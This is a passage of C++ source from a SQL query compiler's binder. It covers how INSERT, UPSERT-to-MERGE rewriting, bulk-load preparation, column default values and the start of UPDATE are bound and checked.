or REL_TUPLE_LIST is being used. if ((getOperatorType() == REL_UNARY_INSERT) && (getTableDesc()->getNATable()->isHbaseRowTable())) { NABoolean isError = FALSE; if (NOT (child(0)->getOperatorType() == REL_TUPLE || // VALUES (1,'b') child(0)->getOperatorType() == REL_TUPLE_LIST)) // VALUES (1,'b'),(2,'Y') { isError = TRUE; } // Also make sure that inserts into column_details field of _ROW_ format // hbase virtual table are being done through column_create function. // For ex: insert into hbase."_ROW_".hb values ('1', column_create('cf:a', '100')) // if ((NOT isError) && (child(0)->getOperatorType() == REL_TUPLE)) { ValueIdList &tup = ((Tuple*)(child(0)->castToRelExpr()))->tupleExpr(); if (tup.entries() == 2) // can only have 2 entries { ItemExpr * ie = tup[1].getItemExpr(); if (ie && ie->getOperatorType() != ITM_HBASE_COLUMN_CREATE) { isError = TRUE; } } else isError = TRUE; } if ((NOT isError) && (child(0)->getOperatorType() == REL_TUPLE_LIST)) { TupleList * tl = (TupleList*)(child(0)->castToRelExpr()); for (CollIndex x = 0; x < (UInt32)tl->numTuples(); x++) { ValueIdList tup; if (!tl->getTuple(bindWA, tup, x)) { isError = TRUE; } if (NOT isError) { if (tup.entries() == 2) // must have 2 entries { ItemExpr * ie = tup[1].getItemExpr(); if (ie->getOperatorType() != ITM_HBASE_COLUMN_CREATE) { isError = TRUE; } } else isError = TRUE; } // if } // for } // if if (isError) { *CmpCommon::diags() << DgSqlCode(-1429); bindWA->setErrStatus(); return boundExpr; } } // the only time that tgtColList.entries()(Insert's colList) != tl->castToList().entries() // (TupleList's colList) is when DEFAULTS are removed in TupleList::bindNode() for insert // into table with IDENTITY column, where the system generates the values // for it using SG (Sequence Generator). // See TupleList::bindNode() for detailed comments. // When tgtColList.entries()(Insert's col list) is not // equal to tl->castToList().entries() (TupleList's column list) // make sure the correct colList is used during binding. 
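  // (Illustrative: if the target table has a system-generated IDENTITY column and
  //  the VALUES list supplied DEFAULT for it, TupleList::bindNode() removed that
  //  entry, so tl->castToList() has exactly one fewer entry than tgtColList.)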
ValueIdList newTgtColList; if(tl && (tgtColList.entries() != tl->castToList().entries())) { newTgtColList = tl->castToList(); CMPASSERT(newTgtColList.entries() == (tgtColList.entries() -1)); } else newTgtColList = tgtColList; setTargetUserColPosList(); bindWA->getCurrentScope()->xtnmStack()->removeXTNM(); bindWA->getCurrentScope()->setRETDesc(currRETDesc); NABoolean bulkLoadIndex = bindWA->isTrafLoadPrep() && noIMneeded() ; if (someNonDefaultValuesSpecified) // query-expr child specified { const RETDesc &sourceTable = *child(0)->getRETDesc(); if ((sourceTable.getDegree() != newTgtColList.entries())&& !bulkLoadIndex) { // 4023 degree of row value constructor must equal that of target table *CmpCommon::diags() << DgSqlCode(-4023) #pragma nowarn(1506) // warning elimination << DgInt0(sourceTable.getDegree()) << DgInt1(tgtColList.entries()); #pragma warn(1506) // warning elimination bindWA->setErrStatus(); return boundExpr; } OptSqlTableOpenInfo* stoiInList = NULL; for (CollIndex ii=0; ii < bindWA->getStoiList().entries(); ii++) { if (getOptStoi() && getOptStoi()->getStoi()) { if (strcmp((bindWA->getStoiList())[ii]->getStoi()->fileName(), getOptStoi()->getStoi()->fileName()) == 0) { stoiInList = bindWA->getStoiList()[ii]; break; } } } // Combine the ValueIdLists for the column list and value list into a // ValueIdSet (unordered) of Assign nodes and a ValueIdArray (ordered). // Maintain a ValueIdMap between the source and target value ids. CollIndex i2 = 0; const ColumnDescList *viewColumns = NULL; if (getBoundView()) viewColumns = getBoundView()->getRETDesc()->getColumnList(); if (bulkLoadIndex) { setRETDesc(child(0)->getRETDesc()); } for (i = 0; i < tgtColList.entries() && i2 < newTgtColList.entries(); i++) { if(tgtColList[i] != newTgtColList[i2]) continue; ValueId target = tgtColList[i]; ValueId source ; if (!bulkLoadIndex) source = sourceTable.getValueId(i2); else { ColRefName & cname = ((ColReference *)(baseColRefs()[i2]))->getColRefNameObj(); source = sourceTable.findColumn(cname)->getValueId(); } CMPASSERT(target != source); const NAColumn *nacol = target.getNAColumn(); const NAType &sourceType = source.getType(); const NAType &targetType = target.getType(); if ( DFS2REC::isFloat(sourceType.getFSDatatype()) && DFS2REC::isNumeric(targetType.getFSDatatype()) && (getTableDesc()->getNATable()->getPartitioningScheme() == COM_HASH_V1_PARTITIONING || getTableDesc()->getNATable()->getPartitioningScheme() == COM_HASH_V2_PARTITIONING) ) { const NAColumnArray &partKeyCols = getTableDesc()->getNATable() ->getClusteringIndex()->getPartitioningKeyColumns(); for (CollIndex j=0; j < partKeyCols.entries(); j++) { if (partKeyCols[j]->getPosition() == nacol->getPosition()) { ItemExpr *ie = source.getItemExpr(); ItemExpr *cast = new (bindWA->wHeap()) Cast(ie, &targetType, ITM_CAST); cast = cast->bindNode(bindWA); if (bindWA->errStatus()) return NULL; source = cast->getValueId(); } } } Assign *assign = new (bindWA->wHeap()) Assign(target.getItemExpr(), source.getItemExpr()); assign->bindNode(bindWA); if(bindWA->errStatus()) return NULL; if (stoiInList && !getUpdateCKorUniqueIndexKey()) { if(!getBoundView()) stoiInList->addInsertColumn(nacol->getPosition()); else { NABoolean found = FALSE; for (CollIndex k=0; k < viewColumns->entries(); k++) { if ((*viewColumns)[k]->getValueId() == target) { stoiInList->addInsertColumn((Lng32) k); found = TRUE; // Updatable views cannot have any underlying basetable column // appear more than once, so it's safe to break out of the loop. 
break; } } // loop k CMPASSERT(found); } } // // Check for automatically inserted TRANSLATE nodes. // Such nodes are inserted by the Implicit Casting And Translation feature. // If this node has a child TRANSLATE node, then that TRANSLATE node // is the real "source" that we must use from here on. // ItemExpr *assign_child = assign->child(1); if ( assign_child->getOperatorType() == ITM_CAST ) { const NAType& type = assign_child->getValueId().getType(); if ( type.getTypeQualifier() == NA_CHARACTER_TYPE ) { ItemExpr *assign_grndchld = assign_child->child(0); if ( assign_grndchld->getOperatorType() == ITM_TRANSLATE ) { source = assign_grndchld->getValueId(); CMPASSERT(target != source); } } } const NAType *colType = nacol->getType(); if (!colType->isSupportedType()) { *CmpCommon::diags() << DgSqlCode(-4027) // 4027 table not insertable << DgTableName(nacol->getNATable()->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); } if (bindWA->errStatus()) return boundExpr; newRecExprArray().insertAt(nacol->getPosition(), assign->getValueId()); newRecExpr().insert(assign->getValueId()); const NAType& assignSrcType = assign->getSource().getType(); // if ( <we added some type of conversion> AND // ( <tgt and src are both character> AND // (<they are big and errors can occur> OR <charsets differ> OR <difference between tgt and src lengths is large>))) // OR // ( <we changed the basic type and we allow incompatible types> ) // ) // <then incorporate this added conversion into the updateToSelectMap> if ( source != assign->getSource() && ((assignSrcType.getTypeQualifier() == NA_CHARACTER_TYPE && sourceType.getTypeQualifier() == NA_CHARACTER_TYPE && ((assign->getSource().getItemExpr()->getOperatorType() == ITM_CAST && sourceType.errorsCanOccur(assignSrcType) && sourceType.getNominalSize() > CmpCommon::getDefaultNumeric(LOCAL_MESSAGE_BUFFER_SIZE)*1024) || // Temporary code to fix QC4395 in M6. For M7, try to set source // to the right child of the assign after calling assign->bindNode. // We should then be able to eliminate this entire if statement // as well as the code to check for TRANSLATE nodes above. ((CharType &) assignSrcType).getCharSet() != ((CharType &) sourceType).getCharSet() || // The optimizer may ask for source data to be partitioned or sorted on original source columns // This is the reason we need to choose the else branch below unless we have a particular reason // to do otherwise. Each of the conditions in this if statement reflects one of those partcular // conditions. The bottomValues of updateToSelectMap will be placed in their entirety in the // characteristic outputs of the source node. Outputs of the source node may be used to allocate // buffers at runtime and therefore we would like to keep the output as small as possible. // If the source cannot be partioned/sorted on a column because we have assign-getSource in the bottomValues // then the cost is that data will be repartitioned with an additional exchange node. If the difference in // length between source and assignSrc is large then the cost of repartition is less than the cost of // allocating and using large buffers. 
sourceType.getNominalSize() > (assignSrcType.getNominalSize() + (ActiveSchemaDB()->getDefaults()).getAsLong(COMP_INT_98)) // default value is 512 )) || // If we allow incompatible type assignments, also include the // added cast into the updateToSelectMap assignSrcType.getTypeQualifier() != sourceType.getTypeQualifier() && CmpCommon::getDefault(ALLOW_INCOMPATIBLE_ASSIGNMENT) == DF_ON)) { updateToSelectMap().addMapEntry(target,assign->getSource()); } else { updateToSelectMap().addMapEntry(target,source); } i2++; } } setBoundView(NULL); // Is the table round-robin (horizontal) partitioned? PartitioningFunction *partFunc = getTableDesc()->getClusteringIndex()->getNAFileSet()-> getPartitioningFunction(); NABoolean isRRTable = partFunc && partFunc->isARoundRobinPartitioningFunction(); // Fill in default values for any columns not explicitly specified. // if (someNonDefaultValuesSpecified) // query-expr child specified, set system cols defaultColCount = totalColCount - newTgtColList.entries(); else // "DEFAULT VALUES" specified defaultColCount = totalColCount; if (identityColumnGeneratedAlways) defaultColCount = totalColCount; if (defaultColCount) { NAWchar zero_w_Str[2]; zero_w_Str[0] = L'0'; zero_w_Str[1] = L'\0'; // wide version CollIndex sysColIx = 0, usrColIx = 0; for (i = 0; i < totalColCount; i++) { ValueId target; NABoolean isASystemColumn = FALSE; const NAColumn *nacol = NULL; // find column on position i in the system or user column lists if (sysColIx < sysColList.entries() && sysColList[sysColIx].getNAColumn()->getPosition() == i) { isASystemColumn = TRUE; target = sysColList[sysColIx]; } else { CMPASSERT((*userColListPtr)[usrColIx].getNAColumn()->getPosition() == i); target = (*userColListPtr)[usrColIx]; } nacol = target.getNAColumn(); // if we need to add the default value, we don't have a new rec expr yet if (NOT newRecExprArray().used(i)) { // check for SQL/MP entry sequenced tables omitted above const char* defaultValueStr = NULL; ItemExpr * defaultValueExpr = NULL; NABoolean needToDeallocateColDefaultValueStr = FALSE; // Used for datetime columns with COM_CURRENT_DEFAULT. // NAType *castType = NULL; if (isASystemColumn) { if (isRRTable) { bindInsertRRKey(bindWA, this, sysColList, sysColIx); if (bindWA->errStatus()) return boundExpr; } if (nacol->isComputedColumn()) { CMPASSERT(target.getItemExpr()->getOperatorType() == ITM_BASECOLUMN); ValueId defaultExprValId = ((BaseColumn *) target.getItemExpr())-> getComputedColumnExpr(); ValueIdMap updateToSelectMapCopy(updateToSelectMap()); // Use a copy to rewrite the value, to avoid requesting additional // values from the child. We ask the child for all entries in this // map in GenericUpdate::pushdownCoveredExpr(). updateToSelectMapCopy.rewriteValueIdDown(defaultExprValId, defaultExprValId); defaultValueExpr = defaultExprValId.getItemExpr(); } else defaultValueStr = (char *)zero_w_Str; } else { // a user column (cf. Insert::getColDefaultValue) CMPASSERT(NOT nacol->isComputedColumn()); // computed user cols not yet supported defaultValueStr = nacol->getDefaultValue(); } if (NOT defaultValueStr && NOT defaultValueExpr) { // 4024 column has neither a default nor an explicit value. *CmpCommon::diags() << DgSqlCode(-4024) << DgColumnName(nacol->getColName()); bindWA->setErrStatus(); return boundExpr; } if (defaultValueStr) { // If the column has a default class of COM_CURRENT_DEFAULT, // cast the default value (which is CURRENT_TIMESTAMP) to // the type of the column. Here we capture the type of the // column. 
COM_CURRENT_DEFAULT is only used for Datetime // columns. // if (nacol->getDefaultClass() == COM_CURRENT_DEFAULT) { castType = nacol->getType()->newCopy(bindWA->wHeap()); } else if ((nacol->getDefaultClass() == COM_IDENTITY_GENERATED_ALWAYS) || (nacol->getDefaultClass() == COM_IDENTITY_GENERATED_BY_DEFAULT)) { setSystemGeneratesIdentityValue(TRUE); } // Bind the default value, make an Assign, etc, as above Parser parser(bindWA->currentCmpContext()); // save the current parserflags setting ULng32 savedParserFlags = Get_SqlParser_Flags (0xFFFFFFFF); Set_SqlParser_Flags(INTERNAL_QUERY_FROM_EXEUTIL); Set_SqlParser_Flags(ALLOW_VOLATILE_SCHEMA_IN_TABLE_NAME); defaultValueExpr = parser.getItemExprTree(defaultValueStr); CMPASSERT(defaultValueExpr); // Restore parser flags settings to what they originally were Assign_SqlParser_Flags (savedParserFlags); } // defaultValueStr != NULL Assign *assign = NULL; // If the default value string was successfully parsed, // Create an ASSIGN node and bind. // if (defaultValueExpr) { // If there is a non-NULL castType, then cast the default // value to the castType. This is used in the case of // datetime value with COM_CURRENT_DEFAULT. The default // value will be CURRENT_TIMESTAMP for all datetime types, // so must cast the CURRENT_TIMESTAMP to the type of the // column. // if(castType) { defaultValueExpr = new (bindWA->wHeap()) Cast(defaultValueExpr, castType); } // system generates value for IDENTITY column. if (defaultValueExpr->getOperatorType() == ITM_IDENTITY && (CmpCommon::getDefault(COMP_BOOL_210) == DF_ON)) { // SequenceGenerator::createSequenceSubqueryExpression() // is called for introducing the subquery in // defaultValueExpr::bindNode() (IdentityVar::bindNode()). // We bind here to make sure the correct subquery // is used. defaultValueExpr = defaultValueExpr->bindNode(bindWA); } if (((isUpsertLoad()) || ((isUpsert()) && (getTableDesc()->getNATable()-> isSQLMXAlignedTable()))) && (NOT defaultValueExpr->getOperatorType() == ITM_IDENTITY) && (NOT isASystemColumn)) { // for 'upsert using load' construct, all values must be specified so // data could be loaded using inserts. // If some values are missing, then it becomes an update. *CmpCommon::diags() << DgSqlCode(-4246) ; bindWA->setErrStatus(); return boundExpr; } assign = new (bindWA->wHeap()) Assign(target.getItemExpr(), defaultValueExpr, FALSE /*not user-specified*/); assign->bindNode(bindWA); } // // Note: Parser or Binder errors from MP texts are possible. // if (!defaultValueExpr || bindWA->errStatus()) { // 7001 Error preparing default on <column> for <table>. 
*CmpCommon::diags() << DgSqlCode(-7001) << DgString0(defaultValueStr) << DgString1(nacol->getFullColRefNameAsAnsiString()); bindWA->setErrStatus(); return boundExpr; } newRecExprArray().insertAt(i, assign->getValueId()); newRecExpr().insert(assign->getValueId()); updateToSelectMap().addMapEntry(target,defaultValueExpr->getValueId()); if (needToDeallocateColDefaultValueStr && defaultValueStr != NULL) { NADELETEBASIC((NAWchar*)defaultValueStr, bindWA->wHeap()); defaultValueStr = NULL; } if (--defaultColCount == 0) break; // tiny performance hack } // NOT newRecExprArray().used(i) else { if (nacol->getDefaultClass() == COM_IDENTITY_GENERATED_ALWAYS) { Assign * assign = (Assign*)newRecExprArray()[i].getItemExpr(); ItemExpr * ie = assign->getSource().getItemExpr(); if (NOT ie->wasDefaultClause()) { *CmpCommon::diags() << DgSqlCode(-3428) << DgString0(nacol->getColName()); bindWA->setErrStatus(); return boundExpr; } } } if (isASystemColumn) sysColIx++; else usrColIx++; } // for i < totalColCount } // defaultColCount // Now add the default values created as part of the Assigns above // to the charcteristic inputs. The user specified values are added // to the characteristic inputs during GenericUpdate::bindNode // executed earlier as part of this method. getGroupAttr()->addCharacteristicInputs(bindWA-> getCurrentScope()-> getOuterRefs()); if (isRRTable) { // LCOV_EXCL_START - const LIST(IndexDesc *) indexes = getTableDesc()->getIndexes(); for(i = 0; i < indexes.entries(); i++) { indexes[i]->getPartitioningFunction()->setAssignPartition(TRUE); } // LCOV_EXCL_STOP } // It is a system generated identity value if // identityColumn() != NULL_VALUE_ID. The identityColumn() // is set two places (1) earlier in this method. // (2) DefaultSpecification::bindNode() // The IDENTITY column of type GENERATED ALWAYS AS IDENTITY // must be specified in the values list as (DEFAULT) or // must be excluded from the values list forcing the default. if (identityColumnGeneratedAlways && NOT systemGeneratesIdentityValue()) { // The IDENTITY column type of GENERATED ALWAYS AS IDENTITY // can not be used with user specified values. // However, if the override CQD is set, then // allow user specified values to be added // for a GENERATED ALWAYS AS IDENTITY column. if (CmpCommon::getDefault(OVERRIDE_GENERATED_IDENTITY_VALUES) == DF_OFF) { *CmpCommon::diags() << DgSqlCode(-3428) << DgString0(identityColumnName.data()); bindWA->setErrStatus(); return boundExpr; } } ItemExpr *orderByTree = removeOrderByTree(); if (orderByTree) { bindWA->getCurrentScope()->context()->inOrderBy() = TRUE; bindWA->getCurrentScope()->setRETDesc(child(0)->getRETDesc()); orderByTree->convertToValueIdList(reqdOrder(), bindWA, ITM_ITEM_LIST); bindWA->getCurrentScope()->context()->inOrderBy() = FALSE; if (bindWA->errStatus()) return NULL; bindWA->getCurrentScope()->setRETDesc(getRETDesc()); } setInUpdateOrInsert(bindWA); // Triggers -- NABoolean insertFromValuesList = getOperatorType() == REL_UNARY_INSERT && (child(0)->getOperatorType() == REL_TUPLE || // VALUES (1,'b') child(0)->getOperatorType() == REL_TUPLE_LIST || // VALUES (1,'b'),(2,'Y') child(0)->getOperatorType() == REL_UNION); // VALUES with subquery // Insert from values that gets input from above should not use flow, // for performance. Cases, other than TUPLE, should be investigated. 
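  // (setNoFlow(TRUE) below marks the node so the optimizer will not choose a
  // TupleFlow operator for it; the MTS/bulk-load handling further down sets
  // the same flag for the same reason.)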
if (bindWA->findNextScopeWithTriggerInfo() != NULL && (getGroupAttr()->getCharacteristicInputs() != NULL) && (insertFromValuesList)) setNoFlow(TRUE); if (getUpdateCKorUniqueIndexKey()) { SqlTableOpenInfo * scanStoi = getLeftmostScanNode()->getOptStoi()->getStoi(); short updateColsCount = scanStoi->getColumnListCount(); getOptStoi()->getStoi()->setColumnListCount(updateColsCount); getOptStoi()->getStoi()->setColumnList(new (bindWA->wHeap()) short[updateColsCount]); for (short i=0; i<updateColsCount; i++) getOptStoi()->getStoi()->setUpdateColumn(i,scanStoi->getUpdateColumn(i)); } if ((getIsTrafLoadPrep()) && (getTableDesc()->getCheckConstraints().entries() != 0 || getTableDesc()->getNATable()->getRefConstraints().entries() != 0 )) { // enabling/disabling constraints is not supported yet //4486--Constraints not supported with bulk load. Disable the constraints and try again. *CmpCommon::diags() << DgSqlCode(-4486) << DgString0("bulk load") ; } if (getIsTrafLoadPrep()) { PartitioningFunction *pf = getTableDesc()->getClusteringIndex()->getPartitioningFunction(); const NodeMap* np; Lng32 partns = 1; if ( pf && (np = pf->getNodeMap()) ) { partns = np->getNumEntries(); if(partns > 1 && CmpCommon::getDefault(ATTEMPT_ESP_PARALLELISM) == DF_OFF) // 4490 - BULK LOAD into a salted table is not supported if ESP parallelism is turned off *CmpCommon::diags() << DgSqlCode(-4490); } } if (isUpsertThatNeedsMerge()) { boundExpr = xformUpsertToMerge(bindWA); return boundExpr; } else if (NOT (isMerge() || noIMneeded())) boundExpr = handleInlining(bindWA, boundExpr); // turn OFF Non-atomic Inserts for ODBC if we have detected that Inlining is needed // necessary warnings have been generated in handleInlining method. if (CmpCommon::getDefault(ODBC_PROCESS) == DF_ON) { if (bindWA->getHostArraysArea() && (NOT bindWA->getHostArraysArea()->getRowwiseRowset()) && !(bindWA->getHostArraysArea()->getTolerateNonFatalError())) setTolerateNonFatalError(RelExpr::UNSPECIFIED_); } // When mtsStatement_ or bulkLoadIndex is set Insert needs to return rows; // so potential outputs are added (note that it's not replaced) to // the Insert node. Currently mtsStatement_ is set // for MTS queries and embedded insert queries. if (isMtsStatement() || bulkLoadIndex) { if(isMtsStatement()) setRETDesc(new (bindWA->wHeap()) RETDesc(bindWA, getTableDesc())); bindWA->getCurrentScope()->setRETDesc(getRETDesc()); ValueIdList outputs; getRETDesc()->getValueIdList(outputs, USER_AND_SYSTEM_COLUMNS); ValueIdSet potentialOutputs; getPotentialOutputValues(potentialOutputs); potentialOutputs.insertList(outputs); setPotentialOutputValues(potentialOutputs); // this flag is set to indicate optimizer not to pick the // TupleFlow operator setNoFlow(TRUE); } return boundExpr; } // Insert::bindNode() /* Upsert into a table with an index is converted into a Merge to avoid the problem described in LP 1460771. An upsert may overwrite an existing row in the base table (identical to the update when matched clause of Merge) or it may insert a new row into the base table (identical to insert when not matched clause of merge). If the upsert caused a row to be updated in the base table then the old version of the row will have to be deleted from indexes, and a new version inserted. Upsert is being transformed to merge so that we can delete the old version of an updated row from the index. 
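   As a rough, hypothetical example: for a table T with a secondary index on
   column b, "UPSERT INTO T VALUES (1, 10)" is rewritten into the equivalent of
   a MERGE on T's clustering key, with the non-key columns in the update (SET)
   part and all source values in the insert part, so that an overwritten row's
   old index entry can be removed before the new one is inserted (see
   xformUpsertToMerge below).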
*/ NABoolean Insert::isUpsertThatNeedsMerge() const { if (!isUpsert() || getIsTrafLoadPrep() || (getTableDesc()->isIdentityColumnGeneratedAlways() && getTableDesc()->hasIdentityColumnInClusteringKey()) || getTableDesc()->getClusteringIndex()->getNAFileSet()->hasSyskey() || !(getTableDesc()->hasSecondaryIndexes())) return FALSE; return TRUE; } RelExpr* Insert::xformUpsertToMerge(BindWA *bindWA) { NATable *naTable = bindWA->getNATable(getTableName()); if (bindWA->errStatus()) return NULL; if ((naTable->getViewText() != NULL) && (naTable->getViewCheck())) { *CmpCommon::diags() << DgSqlCode(-3241) << DgString0(" View with check option not allowed."); bindWA->setErrStatus(); return NULL; } const ValueIdList &tableCols = updateToSelectMap().getTopValues(); const ValueIdList &sourceVals = updateToSelectMap().getBottomValues(); Scan * inputScan = new (bindWA->wHeap()) Scan(CorrName(getTableDesc()->getCorrNameObj(), bindWA->wHeap())); ItemExpr * keyPred = NULL; ItemExpr * keyPredPrev = NULL; ItemExpr * setAssign = NULL; ItemExpr * setAssignPrev = NULL; ItemExpr * insertVal = NULL; ItemExpr * insertValPrev = NULL; ItemExpr * insertCol = NULL; ItemExpr * insertColPrev = NULL; BaseColumn* baseCol; ColReference * targetColRef; int predCount = 0; int setCount = 0; ValueIdSet myOuterRefs; for (CollIndex i = 0; i<tableCols.entries(); i++) { baseCol = (BaseColumn *)(tableCols[i].getItemExpr()) ; if (baseCol->getNAColumn()->isSystemColumn()) continue; targetColRef = new(bindWA->wHeap()) ColReference( new(bindWA->wHeap()) ColRefName( baseCol->getNAColumn()->getFullColRefName(), bindWA->wHeap())); if (baseCol->getNAColumn()->isClusteringKey()) { keyPredPrev = keyPred; keyPred = new (bindWA->wHeap()) BiRelat(ITM_EQUAL, targetColRef, sourceVals[i].getItemExpr()); predCount++; if (predCount > 1) { keyPred = new(bindWA->wHeap()) BiLogic(ITM_AND, keyPredPrev, keyPred); } } else { setAssignPrev = setAssign; setAssign = new (bindWA->wHeap()) Assign(targetColRef, sourceVals[i].getItemExpr()); setCount++; if (setCount > 1) { setAssign = new(bindWA->wHeap()) ItemList(setAssign,setAssignPrev); } } myOuterRefs += sourceVals[i]; insertValPrev = insertVal; insertColPrev = insertCol ; insertVal = sourceVals[i].getItemExpr(); insertCol = new(bindWA->wHeap()) ColReference( new(bindWA->wHeap()) ColRefName( baseCol->getNAColumn()->getFullColRefName(), bindWA->wHeap())); if (i > 0) { insertVal = new(bindWA->wHeap()) ItemList(insertVal,insertValPrev); insertCol = new(bindWA->wHeap()) ItemList(insertCol,insertColPrev); } } inputScan->addSelPredTree(keyPred); RelExpr * re = NULL; re = new (bindWA->wHeap()) MergeUpdate(CorrName(getTableDesc()->getCorrNameObj(), bindWA->wHeap()), NULL, REL_UNARY_UPDATE, inputScan, setAssign, insertCol, insertVal, bindWA->wHeap(), NULL); ((MergeUpdate *)re)->setXformedUpsert(); ValueIdSet debugSet; if (child(0) && (child(0)->getOperatorType() != REL_TUPLE)) { RelExpr * mu = re; re = new(bindWA->wHeap()) Join (child(0), re, REL_TSJ_FLOW, NULL); ((Join*)re)->doNotTransformToTSJ(); ((Join*)re)->setTSJForMerge(TRUE); ((Join*)re)->setTSJForMergeWithInsert(TRUE); ((Join*)re)->setTSJForWrite(TRUE); if (bindWA->hasDynamicRowsetsInQuery()) mu->getGroupAttr()->addCharacteristicInputs(myOuterRefs); else re->getGroupAttr()->addCharacteristicInputs(myOuterRefs); } re = re->bindNode(bindWA); if (bindWA->errStatus()) return NULL; return re; } RelExpr *HBaseBulkLoadPrep::bindNode(BindWA *bindWA) { //CMPASSERT((CmpCommon::getDefault(TRAF_LOAD) == DF_ON && // CmpCommon::getDefault(TRAF_LOAD_HFILE) == DF_ON)); if 
(nodeIsBound()) { return this; } Insert * newInsert = new (bindWA->wHeap()) Insert(getTableName(), NULL, REL_UNARY_INSERT, child(0)->castToRelExpr()); newInsert->setInsertType(UPSERT_LOAD); newInsert->setIsTrafLoadPrep(true); newInsert->setCreateUstatSample(getCreateUstatSample()); // Pass the flag to bindWA to guarantee that a range partitioning is // always used for all source and target tables. bindWA->setIsTrafLoadPrep(TRUE); RelExpr *boundNewInsert = newInsert->bindNode(bindWA); if (bindWA->errStatus()) return NULL; return boundNewInsert; } // This is a callback from DefaultSpecification::bindNode // called from Insert::bindNode // (you need to understand the latter to understand this). // const char *Insert::getColDefaultValue(BindWA *bindWA, CollIndex i) const { CMPASSERT(canBindDefaultSpecification()); CollIndexList &colnoList = *targetUserColPosList_; CollIndex pos = colnoList.entries() ? colnoList[i] : i; const ValueIdList &colList = getTableDesc()->getColumnList(); if (colList.entries() <= pos) { // 4023 degree of row value constructor must equal that of target table *CmpCommon::diags() << DgSqlCode(-4023) #pragma nowarn(1506) // warning elimination << DgInt0(++pos) #pragma warn(1506) // warning elimination #pragma nowarn(1506) // warning elimination << DgInt1(colList.entries()); #pragma warn(1506) // warning elimination bindWA->setErrStatus(); return NULL; } ValueId target = colList[pos]; const NAColumn *nacol = target.getNAColumn(); const char* defaultValueStr = nacol->getDefaultValue(); CharInfo::CharSet mapCS = CharInfo::ISO88591; NABoolean mapCS_hasVariableWidth = CharInfo::isVariableWidthMultiByteCharSet(mapCS); size_t defaultValueWcsLen = 0; NAWchar *defaultValueWcs = (NAWchar *) defaultValueStr; NABoolean ucs2StrLitPrefix = FALSE; if (nacol->getDefaultClass() == COM_USER_DEFINED_DEFAULT && nacol->getType() && nacol->getType()->getTypeQualifier() == NA_CHARACTER_TYPE && ((CharType*)(nacol->getType()))->getCharSet() == CharInfo::ISO88591 && mapCS_hasVariableWidth && defaultValueWcs != NULL && nacol->getNATable()->getObjectSchemaVersion() >= COM_VERS_2300 && (defaultValueWcsLen = NAWstrlen(defaultValueWcs)) > 6 && ( ( ucs2StrLitPrefix = ( NAWstrncmp(defaultValueWcs, NAWSTR("_UCS2\'"), 6) == 0 )) || ( defaultValueWcsLen > 10 && NAWstrncmp(defaultValueWcs, NAWSTR("_ISO88591\'"), 10) == 0 )) && defaultValueWcs[defaultValueWcsLen-1] == NAWCHR('\'')) { NAWcharBuf *pWcharBuf = NULL; if (ucs2StrLitPrefix) { // Strip the leading _UCS2 prefix. pWcharBuf = new (bindWA->wHeap()) NAWcharBuf(&defaultValueWcs[5], defaultValueWcsLen - 5, bindWA->wHeap()); } else { // Keep the leading _ISO88591 prefix. pWcharBuf = new (bindWA->wHeap()) NAWcharBuf(defaultValueWcs, defaultValueWcsLen, bindWA->wHeap()); } charBuf *pCharBuf = NULL; // must set this variable to NULL so the // following function call will allocate // space for the output literal string Int32 errorcode = 0; pCharBuf = unicodeTocset(*pWcharBuf, bindWA->wHeap(), pCharBuf, mapCS, errorcode); // Earlier releases treated the converted multibyte character // string, in ISO_MAPPING character set, as if it is a string of // ISO88591 characters and then convert it back to UCS-2 format; // i.e., for each byte in the string, insert an extra byte // containing the binary zero value. 
NADELETE(pWcharBuf, NAWcharBuf, bindWA->wHeap()); pWcharBuf = NULL; // must set this variable to NULL to force the // following call to allocate space for the // the output literal string pWcharBuf = ISO88591ToUnicode(*pCharBuf, bindWA->wHeap(), pWcharBuf); // Prepare the converted literal string for the following CAST // function by setting pColDefaultValueStr to point to the string NAWchar *pWcs = NULL; if (ucs2StrLitPrefix) { pWcs = new (bindWA->wHeap()) NAWchar[10+NAWstrlen(pWcharBuf->data())]; NAWstrcpy(pWcs, NAWSTR("_ISO88591")); } else { pWcs = new (bindWA->wHeap()) NAWchar[1+NAWstrlen(pWcharBuf->data())]; pWcs[0] = NAWCHR('\0'); } NAWstrcat(pWcs, pWcharBuf->data()); defaultValueStr = (char *)pWcs; NADELETE(pWcharBuf, NAWcharBuf, bindWA->wHeap()); NADELETE(pCharBuf, charBuf, bindWA->wHeap()); } if (NOT defaultValueStr AND bindWA) { // 4107 column has no default so DEFAULT cannot be specified. *CmpCommon::diags() << DgSqlCode(-4107) << DgColumnName(nacol->getColName()); bindWA->setErrStatus(); } return defaultValueStr; } // Insert::getColDefaultValue() // ----------------------------------------------------------------------- // member functions for class Update // ----------------------------------------------------------------------- RelExpr *Update::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // Set flag for firstN in context if (child(0) && child(0)->getOperatorType() == REL_SCAN) if (child(0)->castToRelExpr() && ((Scan *)(child(0)->castToRelExpr()))->getFirstNRows() >= 0) if (bindWA && bindWA->getCurrentScope() && bindWA->getCurrentScope()->context()) bindWA->getCurrentScope()->context()->firstN() = TRUE; setInUpdateOrInsert(bindWA, this, REL_UPDATE); RelExpr * boundExpr = GenericUpdate::bindNode(bindWA); if (bindWA->errStatus()) return NULL; setInUpdateOrInsert(bindWA); if (getTableDesc()->getNATable()->isHbaseCellTable()) { *CmpCommon::diags() << DgSqlCode(-1425) << DgTableName(getTableDesc()->getNATable()->getTableName(). getQualifiedNameAsAnsiString()) << DgString0("Reason: Cannot update an hbase table in CELL format. Use ROW format for this operation."); bindWA->setErrStatus(); return this; } // QSTUFF if (getGroupAttr()->isStream() && !getGroupAttr()->isEmbeddedUpdateOrDelete()) { *CmpCommon::diags() << DgSqlCode(-4173); bindWA->setErrStatus(); return this; } // QSTUFF if (NOT bindWA->errStatus() AND NOT getTableDesc()->getVerticalPartitions().isEmpty()) { // 4058 UPDATE query cannot be used on a vertically partitioned table. *CmpCommon::diags() << DgSqlCode(-4058) << DgTableName(getTableDesc()->getNATable()->getTableName(). getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return this; } // make sure scan done as part of an update runs in serializable mode so a // tsj(scan,update) implementation of a update runs as an atomic operation if (child(0)->getOperatorType() == REL_SCAN) { Scan *scanNode = (Scan*)(child(0)->castToRelExpr()); if (!scanNode->accessOptions().userSpecified()) { scanNode->accessOptions().updateAccessOptions (TransMode::ILtoAT(TransMode::SERIALIZABLE_)); } } // if FIRST_N is requested, insert a FirstN node. 
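  // (A sketch of the shape produced here, assuming the update's scan child was
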